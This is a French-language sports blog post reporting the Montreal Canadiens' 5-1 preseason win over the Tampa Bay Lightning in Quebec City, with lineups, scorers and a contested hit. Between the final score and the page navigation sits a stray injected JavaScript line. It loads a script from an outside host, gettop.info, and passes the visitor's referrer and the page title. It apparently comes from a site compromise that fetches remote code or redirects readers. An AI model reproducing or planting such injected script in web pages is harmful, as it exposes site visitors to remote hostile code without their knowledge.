Canadiens de Montréal reçoivent le Lightning de Tampa Bay à Québec


Facebooktwitterredditpinterestlinkedinmail

Le Canadiens de Montréal complétait hier soir leur calendrier pré-saison en affrontant le Lightning de Tampa Bay au Colisée Pepsi de Québec. Le Canadiens a eu énormément de difficulté lors de leur calendrier, n’enregistrant qu’un seul gain à leur 7 derniers matchs.

Carey Price était d’office pour le match alors que sont vis à vis était le québécois Mathieu Garon. Guy Boucher avait décrété sur la patinoire en début de match la french connection alors que Marc-André Bergeron formait la paire de défenseur avec Pavel Kubina. À l’avant Vincent Lecavalier secondé de Martin St-Louis et de Steven Stamkos, trio qui n’a duré que la première présence.

L’ambiance était fébrile dans le Colisée, plusieurs partisans arborant fièrement le chandail fleur de lysée. Pierre Karl Péladeau, qui a assisté au match était très heureux de l’engouement et de voir un match professionnel dans le Colisée Pepsi. Pour les fans de hockey nous avons été servis, quelques bonne mises en échec, un peu de brasse camarade et des buts dignes des pros. Brian Gionta a ouvert la marque en désavantage numérique, s’en est suivi des buts de Gomez, Darche, Cole et de Mike Cammalleri.

Du côté de Tampa, seul Vincent Lecavalier a trouvé le fond du filet grâce a une belle manœuvre du revers.

Le Canadien a eu le contrôle pendant les 60 minutes du match, la troisième période a laissé place à un coup à la tête de Ryan Malone à l’égard du nouveau venu Chris Campoli. Un autre geste que le nouveau préfet de discipline Brendan Shanahan devra à nouveau scruter.

La marque finale 5-1 en faveur du tricolore.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Remparts de Québec: les Wildcats ont frappé un mur
Next Envol et Macadam, samedi 1 octobre Îlot Fleury

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *